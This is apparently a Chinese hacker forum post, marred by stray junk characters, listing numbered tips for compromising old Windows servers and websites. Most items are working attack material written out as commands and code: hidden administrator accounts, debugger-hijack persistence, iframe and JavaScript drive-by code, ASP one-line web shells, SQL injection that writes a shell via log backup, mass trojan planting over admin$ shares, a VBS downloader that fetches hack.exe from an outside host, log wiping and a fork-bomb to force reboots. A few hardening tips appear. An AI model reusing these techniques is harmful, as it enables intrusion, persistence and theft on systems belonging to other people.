Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
# t* ?9 m b& E+ E" J. Ccacls C:\windows\system32 /G hqw20:R
- K5 N* i" z9 k0 I思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
3 f$ o9 {' `: D4 ~" B W恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F* V6 g0 m, j7 @2 U7 h/ r, `
9 _' F+ c& H7 U9 I6 d! J
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
, e2 u* `$ f, H) v e# A& M. F' S% N, ~8 y: z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
+ X7 G- S& S" s3 v0 z0 J9 l2 q4 P8 n# I! Z. O
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号2 k4 Q$ X. p! V/ y/ m1 z" `9 l
3 }, `6 h9 ~3 j5、利用INF文件来修改注册表
5 v0 |5 u4 S9 t[Version]5 U0 x2 c7 p9 j4 a
Signature="$CHICAGO$"
+ @) A/ g- y. p[Defaultinstall]/ g3 j9 X l5 { l1 B" ]8 G
addREG=Ating/ d: e: Z0 l. p
[Ating]
$ d$ X+ K# ^! f1 M0 z5 jHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* r; g u1 w L( Y8 Q; {( J: r N以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
2 K4 O# T9 m. l+ G! s' |0 F3 drundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 f& {( t+ `* t' o: y* N其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 Y# [$ V1 n7 n+ j' p: GHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU& N- Y" i- Z, a5 R6 A u4 h! U' V
HKEY_CURRENT_CONFIG 简写为 HKCC( C! R' q" L7 n9 j: t
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
. T/ I( Y& B% Z& M! H) c* q"1"这里代表是写入或删除注册表键值中的具体数据
& N" ]' Y; E# `" M0 G3 {& |4 l, X; F# B0 E N, d1 w
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 w, ]! }' l* U4 {1 j4 B% u多了一步就是在防火墙里添加个端口,然后导出其键值, f) `. ]- F) t" Z- n4 j3 Q
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]6 o# f7 k: N/ X! H1 {! ]1 G
6 K6 z9 s- g5 n9 x7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽- z4 O! h7 }$ T9 Q& J7 F
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。4 E! e6 B5 [. z
7 a4 p+ s' m* n! @8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 V, ^* y) @% g- V3 _1 b- P
! S7 ?# L! h/ k+ o, N$ r1 A9 [
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
2 w0 V; F( n4 }4 z* m z9 H8 a6 H可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。% l. R2 z! f( S/ p1 Q5 g3 n
; ^2 H7 C- O( C10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
3 T! q% n4 w* @2 X% p. N
! V; [6 P8 a8 d/ d; m4 [3 x11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; ?/ I( c$ }# F. U4 x2 i
用法:xsniff –pass –hide –log pass.txt
! h) F3 f+ n- I
1 X2 Q5 F# ]6 O12、google搜索的艺术8 {& Q( [6 q$ T
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: @* K7 F* f& o或“字符串的语法错误”可以找到很多sql注入漏洞。
9 n6 d- o3 f1 Q$ X% U
5 E& h# {9 L3 N9 x13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。5 h9 @$ h+ I1 B! ^( h
1 z( a# k$ Q6 l+ T' y
14、cmd中输入 nc –vv –l –p 1987
5 G; e e9 B3 q做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
! O. Z& X9 ?8 b$ ?- Z, V6 ~' j+ l) C
15、制作T++木马,先写个ating.hta文件,内容为
& w! Q, P; w9 O. K6 A1 P9 X& f<script language="VBScript">5 j; ^5 W& F5 b4 u' T
set wshshell=createobject ("wscript.shell" )
9 `3 B: K) r& @0 Ua=wshshell.run("你马的名称",1)3 T+ S1 V1 f" w. |. Q
window.close% p* [: Z- y. A- Y9 a
</script>
Z& H, [* b% I2 o8 w再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 W! }8 @+ l$ R) i' E
: _! V9 ` p7 l+ D4 {16、搜索栏里输入
3 F# P: Q' j' L% f8 I" A3 M关键字%'and 1=1 and '%'='& ~! M3 g: h( Q, K2 M
关键字%'and 1=2 and '%'='
" s3 [$ L7 c C7 r/ `7 `比较不同处 可以作为注入的特征字符: x2 m8 u$ W3 v) s6 {! M
4 x7 g( U7 D. l* H8 e/ e
17、挂马代码<html>
5 x$ m2 a2 ~' Q, y<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>* Q3 l7 d' \! V0 R }
</html>
7 C/ u+ k: k2 }6 b9 N( U9 a) @
& v7 }; Z5 w2 [+ u* Y% p8 c, _18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' i" j2 i4 T# K0 P
net localgroup administrators还是可以看出Guest是管理员来。6 @+ a/ C, S; a; `! P. i
+ [3 s% p- A0 Y19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
$ _0 k5 _4 v. \4 w2 s用法: 安装: instsrv.exe 服务名称 路径1 ~: E8 e) |1 t, c& H) q
卸载: instsrv.exe 服务名称 REMOVE' M: I' ?! k) y+ k* D; U' o
0 J6 Y6 X' ?1 ~7 f" H) `7 q9 z( x4 s
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
& Q1 Z% t8 }* d3 j) ~不能注入时要第一时间想到%5c暴库。
, m4 q4 w3 x9 @; `8 q+ z6 u& D8 V$ n4 r+ j+ o) P3 v6 r
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~) f3 f+ x# E1 Y' R
* }9 b9 C! N" ~( i
23、缺少xp_cmdshell时
: ~* v: c( n9 a( t尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 b. e* t' p8 u. v4 ^7 A假如恢复不成功,可以尝试直接加用户(针对开3389的)
' T0 O6 e( g9 ]4 @declare @o int, a; ]! R! V) I1 O, y) ~' I- X
exec sp_oacreate 'wscript.shell',@o out( M7 G# y8 s* o6 M' B
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
0 C% S4 ~" ?4 Z& R, H* o% \7 @% R' B/ F D2 Z! v
24.批量种植木马.bat
# {- S1 S3 N; c0 r/ Ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: c# O" U, D2 A7 s7 E5 Cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间$ N) \2 C8 D. C0 Y
扫描地址.txt里每个主机名一行 用\\开头
4 h6 q6 D) L }) h8 B# @: u1 _% P ~9 K1 v5 k% i0 [4 ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
; x& m. z: Z, l1 q3 b* F
7 D1 g% M! t) g) S26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.7 D3 t. S" ^" d' Q9 b9 o1 d
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.# `" Y9 M$ g2 H/ m
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
) z, l8 n' \1 _5 y7 a, `/ L
: t& n( O1 Q! m% a# L1 Z27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
2 e$ x7 V1 S; L* Z然后用#clear logg和#clear line vty *删除日志% x9 X8 J: z$ U/ t+ i) U3 G4 X
; b$ w6 a" X' |6 N$ s- _( J28、电脑坏了省去重新安装系统的方法
4 _, S5 |0 F4 B" I纯dos下执行,
* I/ E% V# \' V( y; n* zxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
$ [0 r2 X- q: l4 B" c) y( N$ }' ]2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
0 }. u9 B) q% X( @1 w9 a) o6 ?. Y& B+ [
29、解决TCP/IP筛选 在注册表里有三处,分别是:5 ^0 k1 t" S+ f* x! k) U( P8 @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 |; z# j2 c1 yHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! A" `/ U' j- S, k* U
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: g) _5 d# Y3 h
分别用& v2 g) z3 J: e, [1 |2 V. c. v
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 p/ L3 ?; d; J# f2 v: S" D
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip1 a% L, D2 T& h" W; s% A
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 w9 U- [" i% P3 N命令来导出注册表项$ W g2 ~- s1 y) u( h/ p
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
+ \9 I `$ E4 E改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 \& D) Z$ k( I8 T( X( {
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
5 q/ x' D! S* c* e9 s0 U, |$ b4 u) P/ z$ R& M% K: r7 x6 ?
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) e' } L$ x3 L9 _9 u
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
+ n* b# I5 U- T! T- o' V- N, ]6 c5 [& U6 b0 x
31、全手工打造开3389工具6 d& C! R8 w$ y1 I1 p3 b* ]
打开记事本,编辑内容如下:
$ {- ^9 x9 M0 Z% T: Techo [Components] > c:\sql6 q; f+ p2 w& M9 [) m. }6 n
echo TSEnable = on >> c:\sql
8 H8 P/ I/ I, J" {sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 \& D/ i; f. O3 c( G) O( F编辑好后存为BAT文件,上传至肉鸡,执行
( L, J1 R2 O5 [- S6 x6 e+ A+ d0 |4 }: q( C V1 D) n
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 I- h- S4 j/ \
. J: q7 a0 i. l# d( }! c
33、让服务器重启7 p. o8 O% v' h: R2 i; q
写个bat死循环:
% k$ j& b1 p' t0 s; A% n@echo off
6 F/ q4 _- p0 I5 f% H# [5 p, w:loop11 K, ^: x3 o }2 B* m5 q. ^' U
cls
4 b$ T! B# j1 Y6 `+ }start cmd.exe
$ t7 D ~! L: B/ T% egoto loop1" c, @4 A+ x' Z7 H$ }
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启2 l4 @2 k0 M$ X- s2 i9 M1 ?8 H8 E
9 J: G# a+ W& Q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
3 `" q( Z: o+ I. s. W" s+ P1 d@echo off9 {- [% Q* h7 F$ ~+ X1 X" ]
date /t >c:/3389.txt' C- a- P+ R j: p5 c, @
time /t >>c:/3389.txt, Y' ^2 G M3 J r5 {* c. |+ f
attrib +s +h c:/3389.bat4 G- Q, c0 t* i" k! L, E/ f4 t
attrib +s +h c:/3389.txt3 t9 w P. s5 P, i
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; \) U# Q8 e) l; |# e& {2 T并保存为3389.bat
0 K3 M/ f5 q. H/ f0 z; @0 g; m: r h打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
7 Y/ u& R& h0 I* g
8 V6 s( o' }- }* R- K, v' |% [3 l1 a) J35、有时候提不了权限的话,试试这个命令,在命令行里输入:! n1 B, k6 e# x# ^5 i+ y# |: S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)7 {& k3 ^% ^6 b2 }0 q( W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( q/ E; Z& c' A6 u* c3 H0 c3 w1 f; Z }% Q0 ?
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
9 U: `* Z9 K' y/ u% b, b' G/ pecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
0 p1 S$ {/ X$ t# Cecho 你的FTP账号 >>c:\1.bat //输入账号: q' [2 y& x$ y9 C; o
echo 你的FTP密码 >>c:\1.bat //输入密码
7 N! t/ o& `4 }& Decho bin >>c:\1.bat //登入0 D' I* e+ }+ i4 _9 J/ h" b
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
' o/ x/ P. ]" p# R9 kecho bye >>c:\1.bat //退出- M! ]2 _4 ~$ i0 ]) o0 V: o
然后执行ftp -s:c:\1.bat即可( z q# C" ?0 E: e* |/ E
" u# C) o# m5 X1 H
37、修改注册表开3389两法: o( R# E" \5 M/ X, i$ z6 o' X) p
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表4 f# h2 r+ k0 x; N5 L
echo Windows Registry Editor Version 5.00 >>3389.reg) g- S+ {3 G8 l- U& Y& C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
. v8 |4 f* _6 \4 l: }echo "Enabled"="0" >>3389.reg0 V9 G5 |, U. ?: x4 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
6 q: A% o! ], \& x, B W6 q2 _NT\CurrentVersion\Winlogon] >>3389.reg
1 I% {2 J7 d/ Y8 @' F. p+ P6 p/ K% yecho "ShutdownWithoutLogon"="0" >>3389.reg
- c" ^# R- ^) a/ V+ e c) cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer], l: `) U# X. ?! }* @- _7 Z) Q2 Q7 I
>>3389.reg
& X+ |5 E: B8 T* R0 K- e. ^+ Hecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
4 V; t+ E- W- B* P4 \- S6 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]! [' q% g, K. _6 f# q9 q
>>3389.reg; L) G" {8 d, s7 N4 d. g% [! v
echo "TSEnabled"=dword:00000001 >>3389.reg
0 p9 t, y- S4 ]9 K7 l0 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 G/ p. D2 |" x2 N) T' Z. k
echo "Start"=dword:00000002 >>3389.reg3 L. s& B3 [2 O8 ~2 F. D8 h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]- J, S9 r: d0 i$ c% Q' y. u7 [
>>3389.reg$ w+ y, t# Q k/ f: `
echo "Start"=dword:00000002 >>3389.reg
$ y) ~/ D; T' W) R% n) ~/ K6 ~echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- I4 S! T3 j& R4 r( [6 decho "Hotkey"="1" >>3389.reg
- S- H# B) h% \7 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! k; ~% t) `: S, I$ {
Server\Wds\rdpwd\Tds\tcp] >>3389.reg7 m' K9 T: [+ _! h0 O* L
echo "PortNumber"=dword:00000D3D >>3389.reg c$ j. U5 P0 S! v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 M4 M( s0 v2 l1 @* [6 Q
Server\WinStations\RDP-Tcp] >>3389.reg
: g+ Y; j6 Q5 p, m7 xecho "PortNumber"=dword:00000D3D >>3389.reg
/ O% [# n- _1 A2 l" T7 J把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
E: G3 e7 l( ](如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, R: ~" g* Y7 ^因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 s* M& |& K6 {7 t$ Z4 p8 g- P0 M(2)winxp和win2003终端开启
! S+ Z) s g6 \! G r( D" a用以下ECHO代码写一个REG文件:2 h7 i0 q: u; G% t, w6 x5 u- M
echo Windows Registry Editor Version 5.00>>3389.reg. G7 ^8 M/ c6 G( q% l- [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
z2 Y6 M9 x) t+ S& FServer]>>3389.reg
4 A- p$ z. ?$ K4 y6 secho "fDenyTSConnections"=dword:00000000>>3389.reg
' h$ z$ d: M6 [$ B# `! p) C! e- Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* d8 S, L9 k1 t+ z0 n7 B( H
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
( P7 c' E2 |5 l+ K* f. pecho "PortNumber"=dword:00000d3d>>3389.reg, R! m( ~: V1 ]$ q: Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 ?! H8 |, w0 S, _' P
Server\WinStations\RDP-Tcp]>>3389.reg
/ c1 G; p. d F; X& {) s8 jecho "PortNumber"=dword:00000d3d>>3389.reg1 ^ P! _. {* _
然后regedit /s 3389.reg del 3389.reg
1 ]- ?! l0 k! @2 T9 r6 OXP下不论开终端还是改终端端口都不需重启
% {2 @' N1 m' e2 N5 @ ~$ ~; d* U- e1 z% `- T9 N
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 J0 f' @& S" \, K: E7 N. ~用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa') [ x2 @5 J6 c; D
$ L; s E+ ^5 J. F
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
0 F6 M5 W: S# h- v& Z2 ^(1)数据库文件名应复杂并要有特殊字符0 A' h2 A. x7 V' L5 ^
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源% i; M$ C, g2 W1 {6 S
将conn.asp文档中的/ M' t; ^$ T" i* ~1 n
DBPath = Server.MapPath("数据库.mdb")
6 M8 E @# |( R4 E& v2 Econn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
& p0 }6 F* W* \3 R+ K
7 q# T( y/ ^9 i+ s修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 c. I) C" t( q# f+ U5 r0 b(3)不放在WEB目录里
5 B0 g7 g F: m; \) F* N0 g/ |, O- G
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' L8 p! n4 K3 ^) z可以写两个bat文件
9 p4 F/ V, J# [$ U6 ^5 N@echo off
* l7 ?7 o6 `2 k. J5 L7 M6 N7 O@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe, [( h* G# x3 J% Q7 r4 G
@del c:\winnt\system32\query.exe+ f. f G/ f# ^; F Q! _# O4 D# C
@del %SYSTEMROOT%\system32\dllcache\query.exe7 k* Q+ H& U- [- y; C! _
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
3 y- A, u8 C! ^3 q( Z+ d9 y
6 |4 G& I4 Q' p4 a% t7 x@echo off3 ?$ w2 u; N# J+ i% k. U; A/ q$ Q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe9 _! U! i' ], ?* k1 W. v
@del c:\winnt\system32\tsadmin.exe
* v0 P+ b2 ?1 K4 l: c; [8 G5 }@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex' n/ j0 v& E2 H- K
. _( X6 h S- L L8 h. M
41、映射对方盘符3 d+ C# Z/ M& l) b, Y) j
telnet到他的机器上,. d V8 P! |; c# w: H
net share 查看有没有默认共享 如果没有,那么就接着运行
: u+ i9 M8 X g& r- z. Pnet share c$=c:
3 H2 R3 Y, O; Y7 c4 mnet share现在有c$) Y' W( L+ h0 _# t+ H% V: z
在自己的机器上运行/ p" b3 l; u* ?/ r0 {( b6 R
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
5 h; j$ d( m1 q* S
) H1 `2 ]5 b: t0 j7 B+ @- e42、一些很有用的老知识# B2 P% } X+ w0 e
type c:\boot.ini ( 查看系统版本 )
% U/ I; J7 O$ \9 Y4 }net start (查看已经启动的服务)
8 x! }( r. N, c+ |query user ( 查看当前终端连接 )0 S9 z+ B- w9 v+ E, n' F
net user ( 查看当前用户 )
: W$ l' W7 W) Jnet user 用户 密码/add ( 建立账号 )! s; B3 t/ T9 y% a5 M0 F
net localgroup administrators 用户 /add (提升某用户为管理员)
) K. z4 q: s. U% r$ H/ ?ipconfig -all ( 查看IP什么的 )
) j5 f7 h, l/ {! w) fnetstat -an ( 查看当前网络状态 ); ?+ ~# R) D! U y/ ?. C8 e" j5 a
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" Z" A( j! u* V& f' M! p克隆时Administrator对应1F4. M" |# C) I) B$ P
guest对应1F5
2 O; n, n$ |! ]( t2 \+ R' L& ttsinternetuser对应3E8
# ]2 Q% l2 }/ Y. n
6 y) x2 ]& w6 i/ {% q43、如果对方没开3389,但是装了Remote Administrator Service, m! V; @+ e7 l
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接. {' ^/ x' _/ W# X1 A( ^: C/ j! Q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& Q3 P5 s, }% [* V# A# d* n9 Q先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! _7 z$ [. L4 Q3 I' H
0 A# g4 C: z; l$ q% J' x
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
- f" w1 Y# g1 v+ Z, v2 L本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)0 m# r$ j/ Q3 R
5 [' C/ J- Y5 K' F [! ~
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 O1 T: H8 P( D. q, P+ Necho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open: E5 t7 R) ~+ l6 S
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =: @4 {7 _( Y T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# v8 [+ B& u9 x6 y( ~( w: Y1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
3 v- M, J, x; w4 h(这是完整的一句话,其中没有换行符)( J1 x7 u- f% l& W5 t6 W
然后下载:4 D. Q: ^0 \/ O4 j8 P) C& O, a
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
8 p1 H4 _: f& G. e( S* B. g: c4 B3 i0 ~2 {8 `
46、一句话木马成功依赖于两个条件:
9 I, \9 T4 b# d1、服务端没有禁止adodb.Stream或FSO组件
: b2 ^( ^- d" a T: |% [2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。4 n& B) k# m1 E* z9 }, n
' ]+ M; ~3 \" E$ X8 h" E+ N47、利用DB_OWNER权限进行手工备份一句话木马的代码:
/ r8 y8 e& z9 Y' D;alter database utsz set RECOVERY FULL--# l4 Z- N/ C+ U7 M3 l
;create table cmd (a image)--
2 p9 o3 t4 ~/ w;backup log utsz to disk = 'D:\cmd' with init--
. T: P5 `' q; X6 k;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. Q3 f. h0 Q! q0 p P' P% o
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
6 R& A9 \+ E/ o注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 l# }. P( m: N7 w
; |6 q/ I: f) {, k2 A" h48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
8 J ^- A* ?2 \5 A
: G4 W( ^3 D; ^ b2 U用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* p0 _2 a0 s, T: {' u9 Z2 m
所有会话用 'all'。1 j6 p5 e2 r: [) _
-s sessionid 列出会话的信息。( \5 o% k7 o; E7 ]
-k sessionid 终止会话。& j1 D$ j- n0 U+ u* @, B
-m sessionid 发送消息到会话。8 w- ]* |# y2 ^& b
( j. t5 n7 g. K: L; Uconfig 配置 telnet 服务器参数。' A- ?8 q/ _6 k* U1 q
2 k m' q' P3 W, F
common_options 为:6 x. `1 `' a# O# h1 X
-u user 指定要使用其凭据的用户
$ R& |) M+ S. A! @-p password 用户密码
8 D* M) q1 p; j4 t
N- M% d2 p) C9 T R* iconfig_options 为:
3 R9 [) ^6 V* K$ m! D0 ldom = domain 设定用户的默认域
9 R" p( ~' O0 o; S( Zctrlakeymap = yes|no 设定 ALT 键的映射
5 n( J- F- k# J4 otimeout = hh:mm:ss 设定空闲会话超时值2 ?$ t6 [7 z' v* h, Z( Y9 R
timeoutactive = yes|no 启用空闲会话。
# `' t* v& W. g- X2 Vmaxfail = attempts 设定断开前失败的登录企图数。
( N" Q* N7 r; C8 X; n; ?& K* `( ^maxconn = connections 设定最大连接数。" S6 P0 |. X; p0 V# A
port = number 设定 telnet 端口。5 h1 M. n, @' W' r
sec = [+/-]NTLM [+/-]passwd6 `6 S7 v# R7 \ L& p
设定身份验证机构
, a$ N0 y1 }! j+ Z+ J2 p& A9 ^* Lfname = file 指定审计文件名。
7 Q# C9 u$ O5 W/ B- e, hfsize = size 指定审计文件的最大尺寸(MB)。- {, j- a& ?7 B% s2 |. W8 _
mode = console|stream 指定操作模式。, A9 o# u8 D" {, y1 c5 j7 _
auditlocation = eventlog|file|both
& T9 u+ T4 `& c2 t9 }) A指定记录地点9 S9 B. C- g5 S- y2 y8 j
audit = [+/-]user [+/-]fail [+/-]admin
) n3 B5 q% t$ F- d4 l( n4 U! U8 n6 T) W
8 g4 O; T# d# v: ^+ l49、例如:在IE上访问:
: f5 p1 }% H7 xwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/* t( N& M! Q1 f. ]% l, N2 \9 Z1 l
hack.txt里面的代码是:: g2 G9 @) z/ J+ h* F* Y
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">' J# }1 r0 v; O& U
把这个hack.txt发到你空间就可以了!
[0 _) C3 W5 ?+ k这个可以利用来做网马哦!
" `+ f( P$ R2 ?% y( _2 s2 p. P! N T* s0 I* b; f0 i9 Z
50、autorun的病毒可以通过手动限制!; ^8 D' d- _$ d- I2 ?) S
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
V ?% e0 t* S2,打开盘符用右键打开!切忌双击盘符~
# n2 ]" T/ Q3 |& S4 z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!0 \( E8 v( f' b4 X. Z; x) s" Z5 b; n
4 p& S: t8 X* c/ Q0 V( B& m
51、log备份时的一句话木马:9 p% U* q6 c. n* H3 V! z
a).<%%25Execute(request("go"))%%25>1 N. \) z# l0 Q' Q+ l
b).<%Execute(request("go"))%>+ P3 u& L* s& F" m4 A7 g4 q( f
c).%><%execute request("go")%><%' W( U7 c7 P7 U
d).<script language=VBScript runat=server>execute request("sb")</Script>( d5 {! B, A% y& ], t- n7 a: [
e).<%25Execute(request("l"))%25>
9 k( b7 r) G; Z* ], Of).<%if request("cmd")<>"" then execute request("pass")%>3 M, T) X9 p' _* R' s* v4 U
/ a! F4 ~- Y5 V" B }52、at "12:17" /interactive cmd" P: `' l. O( d a2 y" V
执行后可以用AT命令查看新加的任务3 Q1 N, Q- I$ U' D, z+ y, _: m
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。5 A6 \" h( Q1 k- N; h$ F% K
